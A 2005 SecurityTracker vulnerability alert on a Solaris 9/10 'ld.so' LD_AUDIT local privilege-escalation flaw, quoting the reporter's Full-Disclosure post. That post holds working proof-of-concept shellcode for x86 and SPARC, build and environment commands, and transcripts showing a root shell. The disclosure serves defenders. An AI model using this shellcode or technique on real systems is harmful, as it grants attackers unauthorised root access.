Sun Solaris 'ld.so' LD_AUDIT Validation Error Lets Local Users Gain Elevated Privileges
|
|
SecurityTracker Alert ID: 1014317
|
|
SecurityTracker URL: http://securitytracker.com/id?1014317
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 28 2005
|
Impact: Execution of arbitrary code via local system, Root access via local system, User access via local system
|
Exploit Included: Yes
|
Version(s): 9, 10
|
Description: A vulnerability was reported in Sun Solaris in 'ld.so'. A local user may be able to gain elevated privileges.
The 'ld.so' loader does not properly validate user-supplied input in the LD_AUDIT environment variable when executing binaries with
elevated privileges. A local user can create arbitrary code and set the environment variable to point to the arbitrary code (as
a dynamic library). Then, when a set user id (setuid) or set group id (setgid) binary is invoked, the arbitrary code may be executed
with elevated privileges.
Przemyslaw Frasunek reported this vulnerability.
|
Impact: A local user may be able to execute arbitrary code with elevated privileges.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.sun.com/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: UNIX (Solaris - SunOS)
|
Reported By: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Tue, 28 Jun 2005 01:11:58 +0200
From: Przemyslaw Frasunek <venglin@freebsd.lublin.pl>
Subject: [Full-disclosure] Solaris 9/10 ld.so fun
|
ld.so from Solaris 9 and 10 doesn't check LD_AUDIT environment variable when
running s[ug]id binaries, allowing to run arbitrary code with elevated
privileges. Well, I can't belive, that such trivial vulnerability exists in
modern OS...
The following PoC code was tested on:
- SunOS 5.10 Generic i86pc i386 i86pc
- SunOS 5.9 Generic_112233-12 sun4u
It does NOT work on:
SunOS 5.8 Generic_117350-02 sun4u sparc
Example on unpatched Solaris 10 (AMD64):
atari:venglin:~> cat dupa.c
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x0
7\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24
\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x
52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)
Solaris 9 on SPARC:
$ cat dupa.c
char sh[] =
/* setuid() */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve() */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE *
* JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
